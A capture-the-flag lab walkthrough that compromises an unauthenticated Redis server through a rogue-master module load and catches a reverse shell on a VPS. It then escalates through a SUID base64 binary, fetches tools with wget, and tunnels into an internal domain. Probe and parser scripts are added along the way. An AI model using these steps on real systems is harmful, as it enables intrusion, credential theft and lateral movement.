Brute4Road

flag1

First, scan the external-facing target:

D:\shentou\fscan>fscan.exe -h 39.99.146.226

fscan version: 1.8.4
start infoscan
39.99.146.226:22 open
39.99.146.226:21 open
39.99.146.226:80 open
39.99.146.226:6379 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.146.226 code:200 len:4833 title:Welcome to CentOS
[+] ftp 39.99.146.226:21:anonymous
[->]pub
[+] Redis 39.99.146.226:6379 unauthorized file:/usr/local/redis/db/dump.rdb

Two things stand out: anonymous FTP login and unauthenticated Redis (fscan already read the RDB location, /usr/local/redis/db/dump.rdb, which shows CONFIG GET works without a password).
The FTP share doesn't look useful.
Go straight for the Redis master/slave replication attack: point the target at a rogue master on the VPS, have it pull a malicious module over replication and MODULE LOAD it, and catch a reverse shell. Start a listener on VPS port 9090 first.
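
Before firing the rogue server it is worth confirming, in one connection, what the unauthenticated instance actually offers: the version (MODULE LOAD only exists from Redis 4.0), whether CONFIG is still enabled (the replication trick relies on CONFIG SET dir/dbfilename), and where the RDB lands. The script below is an added example, not part of the original write-up and not redis-rogue-server's code; it speaks raw RESP with real Redis commands (PING, INFO, CONFIG GET) and takes the host and port as arguments. The replies used to exercise it in testing are constructed.

```python
"""Check what an unauthenticated Redis exposes before pointing a rogue master at it.

Added example: not from the original write-up and not redis-rogue-server's code.
Host/port are whatever the caller passes in; sample replies are constructed.
"""
import socket


class RedisError(Exception):
    """Error reply ('-...') from the server, e.g. NOAUTH when a password is set."""


class IncompleteReply(Exception):
    """Raised while the buffer does not yet hold a whole reply."""


def resp_encode(*args):
    """Encode a command as a RESP array of bulk strings, as redis-cli sends it."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)


def resp_decode(buf):
    """Decode one RESP reply at the start of buf; return (value, remaining_bytes)."""
    if b"\r\n" not in buf:
        raise IncompleteReply
    kind, body = buf[:1], buf[1:]
    line, _, rest = body.partition(b"\r\n")
    if kind == b"+":                      # simple string
        return line.decode(), rest
    if kind == b"-":                      # error
        raise RedisError(line.decode())
    if kind == b":":                      # integer
        return int(line), rest
    if kind == b"$":                      # bulk string ($-1 is nil)
        n = int(line)
        if n < 0:
            return None, rest
        if len(rest) < n + 2:
            raise IncompleteReply
        return rest[:n].decode(errors="replace"), rest[n + 2:]
    if kind == b"*":                      # array
        items = []
        for _ in range(int(line)):
            item, rest = resp_decode(rest)
            items.append(item)
        return items, rest
    raise ValueError("unknown RESP type %r" % kind)


def redis_cmd(sock, *args):
    """Send one command and read until a complete reply has arrived."""
    sock.sendall(resp_encode(*args))
    buf = b""
    while True:
        chunk = sock.recv(65536)
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
        try:
            return resp_decode(buf)[0]
        except IncompleteReply:
            continue


def parse_info_field(info_text, field):
    """Pull one key out of an INFO reply (lines of key:value)."""
    for line in info_text.splitlines():
        if line.startswith(field + ":"):
            return line.split(":", 1)[1].strip()
    return None


def assess(version, cfg_dir, dbfilename):
    """Summarise the primitives available. The rogue-master route needs CONFIG SET
    (to steer dir/dbfilename) and MODULE LOAD, which exists from Redis 4.0 on."""
    major = int(version.split(".")[0])
    have_config = cfg_dir is not None
    return {
        "version": version,
        "config_command_available": have_config,
        "rdb_path": cfg_dir.rstrip("/") + "/" + dbfilename if have_config else None,
        "module_load_possible": have_config and major >= 4,
    }


def probe_unauth_redis(host, port=6379, timeout=5):
    """Connect with no password; return an assessment dict, or None if AUTH is enforced."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            redis_cmd(s, "PING")
        except RedisError as e:
            if str(e).startswith("NOAUTH"):
                return None               # password set: not the unauthenticated case
            raise                         # e.g. DENIED from protected-mode
        info = redis_cmd(s, "INFO", "server")
        try:
            cfg_dir = redis_cmd(s, "CONFIG", "GET", "dir")[1]
            dbfile = redis_cmd(s, "CONFIG", "GET", "dbfilename")[1]
        except RedisError:                # CONFIG renamed or disabled: dir cannot be steered
            cfg_dir = dbfile = None
        return assess(parse_info_field(info, "redis_version") or "0", cfg_dir, dbfile)


if __name__ == "__main__":
    import sys
    print(probe_unauth_redis(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 6379))
```

Run it as `python3 probe.py 39.99.146.226 6379`; a `None` means a password is set, a `DENIED` error means protected-mode is on and the instance is only reachable from localhost, and `module_load_possible: False` with a 2.x/3.x version means you fall back to the older dir/dbfilename write (cron, authorized_keys, webshell) instead of a module.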

python3 redis-rogue-server.py --rhost 39.99.146.226 --rport 6379 --lhost 47.120.14.151 --lport 6666 --exp exp.so

@copyright n0b0dy @ r3kapig

[info] TARGET 39.99.146.226:6379
[info] SERVER 47.120.14.151:6666
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 47.120.14.151
Reverse server port: 9090
[info] Reverse shell payload sent.
[info] Check at 47.120.14.151:9090
[info] Unload module...

The reverse shell arrives on VPS port 9090. Upgrade it to a pseudo-terminal:

python -c 'import pty; pty.spawn("/bin/bash")'

flag01 is found under /home/redis/flag, but reading it needs more than the redis user's privileges, so we have to escalate.

Try SUID-based escalation first: list every SUID binary on the box.

find / -perm -u=s -type f 2>/dev/null

/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1

/usr/bin/base64 carries the SUID bit (it does not on a stock CentOS install), so it runs as root and will read any file; decode its output to recover the flag.

base64 flag01|base64 -d

flag01: flag{08a51a88-49a1-4ae2-98fe-0a3350eb5252}

Congratulations! ! !
Guess where is the second flag?

Next, pull fscan, frpc and an frpc config onto the host with wget (served from a web server on the VPS):

wget http://47.120.14.151/fscan
wget http://47.120.14.151/frpc
wget http://47.120.14.151/frpc1.toml

Check the internal IP:

hostname -i    # or netstat -ano, which also shows which addresses the services are bound to

172.22.2.7

Scan the internal /24 with fscan (output redirected to 1.txt):

./fscan -h 172.22.2.7/24 > 1.txt

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.18 is alive
(icmp) Target 172.22.2.3 is alive
(icmp) Target 172.22.2.7 is alive
(icmp) Target 172.22.2.16 is alive
(icmp) Target 172.22.2.34 is alive
[*] Icmp alive hosts len is: 5
172.22.2.16:80 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.18:80 open
172.22.2.7:6379 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.18:445 open
172.22.2.34:139 open
172.22.2.3:139 open
172.22.2.16:139 open
172.22.2.34:135 open
172.22.2.18:139 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo
[*]172.22.2.3
[->]DC
[->]172.22.2.3
[*] NetInfo
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] NetBios 172.22.2.34 XIAORANG\CLIENT01
[*] OsInfo 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] OsInfo 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.3 [+] DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetInfo
[*]172.22.2.34
[->]CLIENT01
[->]172.22.2.34
[*] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[+] ftp 172.22.2.7:21:anonymous
[->]pub
[*] WebTitle http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点

Summary so far:
External entry point 39.99.146.226, internal IP 172.22.2.7, already compromised.
Internal host 172.22.2.3 is the domain controller DC.xiaorang.lab (Kerberos on 88).
Internal host 172.22.2.16 is MSSQLSERVER.xiaorang.lab (MSSQL on 1433).
Internal host 172.22.2.18 runs WordPress on port 80, WORKGROUP\UBUNTU-WEB02 (not domain-joined).
Internal host 172.22.2.34 is XIAORANG\CLIENT01, a domain-joined workstation.
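
Reading the host list off a few hundred lines of fscan output by eye is error-prone, so here is a parser that builds the same summary mechanically: open ports per host, NetBios/OsInfo/WebTitle lines as info, and every `[+]` line (credentials, unauthenticated services) as a hit, plus a port-based role guess (88 means a DC, 1433 MSSQL, and so on). This is an added example, not code from the write-up or from fscan; SAMPLE is a constructed excerpt in the line formats the scan above printed, and the role table is a heuristic of mine.

```python
"""Turn fscan's flat text output into a per-host table.

Added example: not from the write-up and not part of fscan. SAMPLE is a
constructed excerpt in the same line formats fscan printed during the scan;
ROLE_PORTS is a heuristic, not something fscan reports."""
import re
from collections import defaultdict

SAMPLE = """\
start infoscan
(icmp) Target 172.22.2.3 is alive
(icmp) Target 172.22.2.18 is alive
172.22.2.3:445 open
172.22.2.3:88 open
172.22.2.16:1433 open
172.22.2.18:80 open
172.22.2.7:6379 open
[*] alive ports len is: 5
[*] NetInfo
[*]172.22.2.3
[->]DC
[*] NetBios 172.22.2.3 [+] DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.2.18 code:200 len:57738 title:Just another WordPress site
[+] ftp 172.22.2.7:21:anonymous
[->]pub
[+] Redis 172.22.2.7:6379 unauthorized file:/usr/local/redis/db/dump.rdb
"""

IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
PORT_RE = re.compile(r"^(\S+):(\d+) open$")
TAGGED_RE = re.compile(r"^\[([*+])\] (\S+) (\S+)\s*(.*)$")   # [*] Module target rest...

ROLE_PORTS = {21: "ftp", 22: "ssh", 80: "http", 88: "kerberos/DC", 389: "ldap",
              445: "smb", 1433: "mssql", 6379: "redis"}


def host_of(token):
    """IP from 'ip', 'ip:port', 'ip:port:user' or 'http://ip[:port]/...'."""
    return re.sub(r"^https?://", "", token).split("/")[0].split(":")[0]


def parse_fscan(text):
    """Return {ip: {"alive", "ports", "info", "hits"}}; [+] lines are the hits."""
    hosts = defaultdict(lambda: {"alive": False, "ports": set(), "info": [], "hits": []})
    for raw in text.splitlines():
        line = raw.strip()
        if m := ALIVE_RE.match(line):
            hosts[m.group(1)]["alive"] = True
        elif m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := TAGGED_RE.match(line):
            marker, module, target, rest = m.groups()
            ip = host_of(target)
            if not IP_RE.fullmatch(ip):          # e.g. "[*] alive ports len is: 5"
                continue
            hosts[ip]["hits" if marker == "+" else "info"].append(
                f"{module} {target} {rest}".strip())
        # NetInfo blocks ("[*]ip" / "[->]name") repeat what the NetBios line says; skipped
    return dict(hosts)


def classify(entry):
    """Rough role labels from open ports (88 => domain controller, 1433 => MSSQL ...)."""
    return sorted(ROLE_PORTS[p] for p in entry["ports"] if p in ROLE_PORTS)


def report(hosts):
    """One line per host: ip, open ports, roles, and every credential/vuln hit."""
    lines = []
    for ip in sorted(hosts, key=lambda s: tuple(int(o) for o in s.split("."))):
        e = hosts[ip]
        ports = ",".join(str(p) for p in sorted(e["ports"]))
        roles = "/".join(classify(e)) or "-"
        lines.append(f"{ip:<14} {ports:<22} {roles:<18} {' | '.join(e['hits'])}".rstrip())
    return lines


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    print("\n".join(report(parse_fscan(data))))
```

Feed it the redirected output (`python3 fscan_table.py 1.txt`); hosts that answered ICMP but showed no ports, and hosts that only appear through a NetBios line, both still get a row, which is the kind of thing that gets missed when skimming.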

First set up a tunnel into the internal network and go after WordPress. frpc1.toml (frp's TOML config, v0.52 and later); this maps VPS port 20022 to 172.22.2.18:80, so the internal site becomes reachable on the VPS's public address and should be limited to your own source IP with a firewall rule:

serverAddr = "47.120.14.151"
serverPort = 7000

[[proxies]]
name = "wp"
type = "tcp"
localIP = "172.22.2.18"
localPort = 80
remotePort = 20022

nohup ./frpc -c ./frpc1.toml >/dev/null 2>&1 &
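
Exposing one port per target gets tedious once the scan shows four more hosts; a SOCKS5 proxy over the same frp connection lets proxychains-style tooling reach all of 172.22.2.0/24 from the VPS. The config below is an added example in frp's TOML format, not a file from the write-up; the remote port, proxy credentials and token are assumptions and the token must match `auth.token` in frps.toml.

```toml
# frpc-socks.toml (added example; port, credentials and token are assumptions)
serverAddr = "47.120.14.151"
serverPort = 7000
auth.token = "replace-with-a-long-random-token"   # same value as auth.token in frps.toml

[[proxies]]
name = "socks"
type = "tcp"
remotePort = 1080            # VPS:1080 becomes a SOCKS5 entry point into 172.22.2.0/24
[proxies.plugin]
type = "socks5"
username = "redteam"         # without these, anyone who can reach VPS:1080 has the same access
password = "replace-with-a-strong-password"
```

Start it the same way as the first config (`nohup ./frpc -c ./frpc-socks.toml >/dev/null 2>&1 &`) and point proxychains at 47.120.14.151:1080. frps binds proxy ports on 0.0.0.0 by default, so 1080 and 20022 should both be restricted to your own source IP in the VPS firewall rather than left open to the internet for the duration of the engagement.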

The target environment crashed at this point; to be continued.

flag2

flag3

flag4